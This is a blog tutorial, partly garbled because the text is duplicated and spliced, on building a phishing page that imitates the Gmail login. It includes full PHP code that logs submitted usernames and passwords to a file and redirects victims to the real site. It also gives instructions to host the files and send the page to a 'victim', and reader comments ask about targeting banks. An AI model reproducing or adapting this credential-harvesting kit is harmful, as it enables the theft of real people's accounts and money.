Sunday, September 15, 2013

How to create fake login page for any website



Phishing is a popular and dangerous hacking technique to steal the confidential information of the people using fake login pages. In this article i m going to show you how to create your own fake login pages for any website.
Before reading this article you need to know the basic concept of phishing. If you are new to phishing, i recommend you to know the basics.

To perform phishing attack, you need to create three files they are


1) .html
2) .php
3) .txt


Procedure:

Step 1:


Open the website for which you want to create a fake login page. In my case it is gmail.
Follow the steps carefully.

Give a right click and then select “view page source”.
It opens the source code of the page.







Now copy the entire code by pressing CTRL+A and paste it in your notepad.

and press CTRL+F at your notepad. It opens a search box. There enter the word “action”.

Now it shows the word “action” by highlighting it.

Here again follow the steps carefully.

Delete everything within the double quotes.

It means https://accounts.google.com/ServiceLoginAuth should be deleted.

And replace it with “mail.php”

And change the word “post” to “get” as shown in the figure.





Now save it as "gmail.html".
Your fake login page is ready.



Step 2:

Now you need to create the file “mail.php”

Just copy the following code in your notepad and save it as “mail.php”


<?php
header ('Location: https://www.google.com/accounts/ServiceLoginAuth?service=mail ');
$handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) {




Phishing is a popular and dangerous hacking technique to steal the confidential information of the people using fake login pages. In this article i m going to show you how to create your own fake login pages for any website.

Before reading this article you need to know the basic concept of phishing. If you are new to phishing, i recommend you to know the basics.

You can read them from here.




What is phishing.




How to hack gmail using phishing.







To perform phishing attack, you need to create three files they are







1) .html

2) .php

3) .txt







Procedure:




Step 1:







Open the website for which you want to create a fake login page. In my case it is gmail.

Follow the steps carefully.




Give a right click and then select “view page source”.

It opens the source code of the page.
















Now copy the entire code by pressing CTRL+A and paste it in your notepad.




and press CTRL+F at your notepad. It opens a search box. There enter the word “action”.




Now it shows the word “action” by highlighting it.




Here again follow the steps carefully.




Delete everything within the double quotes.




It means https://accounts.google.com/ServiceLoginAuth should be deleted.




And replace it with “mail.php”




And change the word “post” to “get” as shown in the figure.










Now save it as "gmail.html".

Your fake login page is ready.




Step 2:




Now you need to create the file “mail.php”




Just copy the following code in your notepad and save it as “mail.php”







<?php

header ('Location: https://www.google.com/accounts/ServiceLoginAuth?service=mail ');

$handle = fopen("log.txt", "a");

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>







Step 3:




create an empty notepad file and save it as “log.txt”.

Now upload these 3 files onto your free webhosting site and then change the permissions of your log.txt file to 777.

Thats it. You are done. Now you can send your fake login page to your victim.




Hope you liked it.. Feel free to comment.

fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Step 3:

create an empty notepad file and save it as “log.txt”.
Now upload these 3 files onto your free webhosting site and then change the permissions of your log.txt file to 777.
Thats it. You are done. Now you can send your fake login page to your victim.

Hope you liked it.. Feel free to comment.

2 comments:

  1. Please Explain step 3

    ReplyDelete
  2. please what is it's not gmail? what if it's a shoping site or a dating site or a bank site?

    ReplyDelete

Follow Me